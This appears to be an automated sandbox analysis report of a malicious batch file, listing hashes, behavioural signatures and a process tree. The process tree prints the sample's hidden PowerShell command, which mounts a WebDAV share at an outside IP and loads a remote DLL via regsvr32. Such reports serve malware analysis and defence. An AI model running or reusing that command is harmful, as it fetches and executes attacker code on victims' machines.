Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
20-07-2024 02:34
Static task
static1
Behavioral task
behavioral1
Sample
191176442074510444.bat
Resource
win7-20240708-en
windows7-x64
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
191176442074510444.bat
Resource
win10v2004-20240709-en
windows10-2004-x64
8 signatures
150 seconds
General
-
Target
191176442074510444.bat
-
Size
18KB
-
MD5
5a764eb6d4d537ff11250efb5770e62b
-
SHA1
559455e898f916b34c1fc75f302835b8c924b756
-
SHA256
e4d5f98ff983b4917127034877fdda4a1187726ece2f309f50322d7c4f846af8
-
SHA512
490efc03ba65e2fdcce22431aaf4fdc58b2210a4f0e732d89ecf20f9c64d0b02d6ba2e10a9d2338fc02fd53afec0da3fe568aea1de5e6dedf8ea7cda12a29d6b
-
SSDEEP
384:I3h/eQJXOWKDXh3VC3fytjgSKdpSeC+4ZwQEbBMoNwWK+5gMJ:l8Xnl6aSK3SeC+4KQABMUwd+j
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2552 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2552 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2552 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2672 wordpad.exe 2672 wordpad.exe 2672 wordpad.exe 2672 wordpad.exe 2672 wordpad.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 2212 wrote to memory of 2672 2212 cmd.exe 31 PID 2212 wrote to memory of 2672 2212 cmd.exe 31 PID 2212 wrote to memory of 2672 2212 cmd.exe 31 PID 2212 wrote to memory of 2552 2212 cmd.exe 32 PID 2212 wrote to memory of 2552 2212 cmd.exe 32 PID 2212 wrote to memory of 2552 2212 cmd.exe 32 PID 2552 wrote to memory of 2600 2552 powershell.exe 34 PID 2552 wrote to memory of 2600 2552 powershell.exe 34 PID 2552 wrote to memory of 2600 2552 powershell.exe 34 PID 2552 wrote to memory of 2720 2552 powershell.exe 35 PID 2552 wrote to memory of 2720 2552 powershell.exe 35 PID 2552 wrote to memory of 2720 2552 powershell.exe 35 PID 2552 wrote to memory of 2720 2552 powershell.exe 35 PID 2552 wrote to memory of 2720 2552 powershell.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\191176442074510444.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\747832556940.dll2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\3⤵PID:2600
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\747832556940.dll3⤵PID:2720
-
-